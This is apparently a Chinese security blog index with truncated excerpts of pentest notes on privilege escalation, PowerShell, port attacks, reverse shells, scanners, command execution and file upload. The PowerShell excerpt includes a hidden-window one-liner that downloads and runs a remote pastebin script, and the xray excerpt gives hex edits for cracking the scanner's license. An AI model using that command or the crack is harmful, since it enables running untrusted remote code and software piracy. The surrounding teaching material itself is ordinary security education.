操作系统提权
操作系统提权权限提升简介权限提升(privilege Escalation):攻击者通过安全漏洞把获取到的受限制的低权限用户突破限制,提权至高权限的管理员用户,从而获得对整个系统的控制权。 常见权限: 1234用户权限(Users)管理员权限(Administrators)系统权限(SYSTEM)访客权限(Guest) 是否提权取决于你的实际场景,不一定会需要提权。 windows提权 123user --> administratoradministrator --> systemservices --> system linux提权 1user --> root 提权分类本地提权: 远程提权: 操作系统提权:windows常用bypassuac和potato提权。linux常用 应用程序提权 提权条件 拥有Webshell、beacon、sessions 拥有普通用户权限 拥有某些软件的账号密码 本地或远程服务器上存在漏洞 拥有漏洞利用工具代码 Windows系统提权1.信息收集可以手动获取,也可以使用工具。 wmic:windows管理工具命令行,提供了 ...
Powershell
Powershell微软;.NET框架;控制和自动化管理widows操作系统;可以逃避Anti-Virus检测 默认安装在win7及以后。 为什么使用: 脚本语言,命令行shell。和不同数量的技术进行交互。 cmdlet; Powershell Cmd 基于.NET框架的基于任务的自动化命令行界面和关联的脚本语言 解释批处理和Powershell命令 加载执行远程脚本:1powershell -c "Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/M676F14U')" Invoke-Expression(IEX的别名):用来把字符串当作命令执行。 WindowStyle Hidden(-w Hidden):隐藏窗口 Nonlnteractive(-NonI):非交互模式,PowerShell不为用户提供交互的提示。 NoProfile(-NoP):PowerShel ...
渗透日记之端口利用
黑客常用端口利用总结# 常见端口渗透 端口号 端口说明 攻击技巧 21/22/69 ftp/tftp:文件传输协议 爆破、嗅探、溢出、后门 22 ssh:远程连接 爆破、OpenSSH、28个退格 23 telnet:远程连接 爆破、嗅探 25 smtp:邮件服务 邮件伪造 53 DNS:域名解析系统 DNS区域传输、DNS劫持、DNS缓存投毒、DNS欺骗、深度利用(利用DNS隧道技术刺透防火墙) 67/68 dhcp:动态主机配置 劫持、欺骗 110 pop3:邮件协议 爆破 139 samba服务:linux系统应用Microsoft网络通讯协议的软件,用于Linux与windows系统直接的文件共享和打印共享 爆破、未授权访问、远程代码执行 143 lmap:交互式邮件存取协议 爆破 161 snmp:简单邮件传输协议 爆破 389 ldap:轻量目录访问 注入攻击、未授权访问 445 smb:win 共享文件 ms17-010/端口溢出 512/513/514 linux rexec服务 直接使用rlogin 8 ...
渗透日记之计算机网络
常见私有IP段:10.0.0.0 ~10.255.255.255 00001010.00000000.00000000.00000000~000001010.11111111.11111111.11111111 172.16.0.0~172.31.255.255 11000000.00010000.00000000.00000000~11000000.00100000.11111111.11111111 192.168.0.0~192.168.255.255 11000000.10101000.00000000.00000000~11000000.101010000.11111111.11111111 2^0=0\;\;\;\;2^1=2\;\;\;\;2^2=4\;\;\;\;2^3=8\;\;\;\;2^4=16\;\;\;\;2^5=32\;\;\;\;2^6=64\;\;\;\;2^7=128网络协议分层应用层提供应用功能;包含c/s p2p模型; 常见的有http,smtp(TCP协议 25端口),ftp(文件传输协议 2 ...
shell反弹其一
linux文件描述符文件描述符是一个非负整数(0~n),内核需要通过这个文件描述符才可以访问文件。文件描述符好比一本书的目录(索引),通过这个索引可以找到需要的内容。在Linux内核默认为每个进程创建三个标准的文件描述符0(标准输入)、1(标准输出)、2(标准错误) 通过查看/proc/PID/fd目录下的文件,就可以查看每个进程拥有的文件描述符。 12#查看当前shell的文件描述符ll /proc/$$/fd [!NOTE] 255文件描述符是一个小技巧,bash用于在重定向时保留这些副本。 打开文件时,系统内核会为特定的进程自动创建对应的文件描述符 12345678# tail打开一个文件tail -f flag# 获取tail进程PIDpidof tail# 查看tail进程创建的文件描述符ll /proc/98/fd 重定向1.输入重定向 12<从文件读取输入。 2.输出重定向 12345>将输出保存到文件。>>将输出追加到文件。 3.管道 12|将一个程序的输出作为输入发送到另一个程序。 文件描述符操作更改标准输出的位置把标准输出更改到test ...
快速配置你的python环境之conda
安装过程: 123https://mirrors.tuna.tsinghua.edu.cn/anaconda/miniconda/Miniconda3-latest-Windows-x86_64.exe#下载链接~ 选择all users — 这里全部勾选。 然后添加环境变量:win+r ->sysdm.cpl 选择高级环境变量;编辑path变量 1D:\minaconda3\condabin #嗯,要按照安装路径自己改的说 给canda换源: 1notepad %USERPROFILE%\.condarc 输入下面的内容 1234567891011121314151617channels: - defaultsshow_channel_urls: truechannel_alias: https://mirrors.tuna.tsinghua.edu.cn/anacondadefault_channels: - https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/main - https://mirrors. ...
漏洞扫描器
漏洞扫描 [!NOTE] xray(网站sql注入,命令执行,xss….)+RAD 图形化GOBY 信息收集,扫描端口,爆破服务弱口令,漏洞扫描,插件 nuclei 历史漏洞(8000+ 历史漏洞的POC【漏洞检测脚本】) XRAY检测速度快;支持范围广;代码质量高;高级可定制;安全无威胁;(长亭 12git地址:https://github.com/chaitin/xray官方文档:https://docs.xray.cool/#/ 破解社区版 12345678910010editor:crtl+f;搜索修改以下内容43 4F 4D 4D 55 4E 49 54 59434F4D4D554E495459COMMUNITY41 4F 4D 4D 55 4E 49 54 59AOMMUNITY41 44 56 41 4E 43 45 44 44ADVANCEDD 使用12345# 完整xray.exe webscan --basic-crawler http://testphp.vulnweb.com/ --html-output vulnweb.com-1.html# 简化xray. ...
渗透日记之docker介绍
Docker~介绍docker组成部分 Docker Client 客户端 Docker Daemon 守护进程 Docker Image 镜像——关键之一 Docker Container 容器——关键之一 [!NOTE] VMware是完全虚拟,硬件虚拟化,虚拟操作系统,驱动,应用程序-——安全,物理隔离。 共用主机的部分应用程序,服务。 云安全。有docker逃逸? 安装方式:(推荐Linux系统) docker.io: apt install docker.io Debian团队维护和打包 docker.ce: Docker 官方团队维护和打包 docker.ee: 商业版 Docker环境安装:使用yijing快速安装: 12345cat etc/apt/soureces.list #检查下载源git clone https://gitee.com/yijingsec/LinuxEnvConfig.gitcd LinuxEnvConfigsudo bash LinuxEnvConfig.sh#选择 11. 脚本自动进行Docker安装 12apt inst ...
命令执行
命令执行原因:分为命令执行漏洞和代码执行漏洞 后端代码没有对用户输入的参数进行严格过滤,导致参数被拼接到命令执行函数中。攻击者可以通过命令执行漏洞在目标服务器执行任意命令 执行的是服务端代码如phpinfo(),而命令执行漏洞执行的是系统命令如whoami 危害: 继承web服务程序的权限去执行系统命令或读写文件 反弹shell,获得目标服务器的权限 进一步内网渗透 php代码执行函数:1234561.eval():eval函数传入的参数必须为php代码,既要以分号结尾;如果想执行系统命令,必须加上命令执行函数如system(“命令”);2.assert():适用于php5版本 php7.0可以用配置文件去掉assert的代码执行,php7.1不能执行代码, php7.2不能传入字符串参数。功能:检测一个断言是否为false3.call_user_func():回调函数4.call_user_func_array()5.preg_replace:php>5.5不再支持,正则表达式替换函数6.array_map 1.eval:eval函数传入的参数必须为php代码,既要以分号结尾 ...
文件上传
漏洞简介文件上传,顾名思义就是上传文件的功能行为,之所以会被发展为危害严重的漏洞,是程序没有对访客提交的数据进行检验或者过滤不严,可以直接提交修改过的数据绕过扩展名的检验。文件上传漏洞是漏洞中最为简单猖獗的利用形式,一般只要能上传获取地址,可执行文件被解析就可以获取系统WebShell。 漏洞原理 网站WEB应用都有一些文件上传功能,比如文档、图片、头像、视频上传,当上传功能的实现代码没有严格校验上传文件的后缀和文件类型时,就可以上传任意文件甚至是可执行文件后门。 漏洞危害恶意文件传递给解释器去执行,之后就可以在服务器上执行恶意代码,进行数据库执行、服务器文件管理,服务器命令执行等恶意操作。根据网站使用及可解析的程序脚本不同,可以上传的恶意脚本可以是PHP、ASP、JSP、ASPX文件。 文件上传检测方式 客户端javascript检测(检测文件扩展名) 服务端MIME类型检测(检测content-type 内容 服务端目录路径检查(检测跟path参数相关的内容 服务端文件扩展名检测(检测跟文件extension相关的内容 服务端文件内容检测(检测是否合法是否含有恶意代码 Websh ...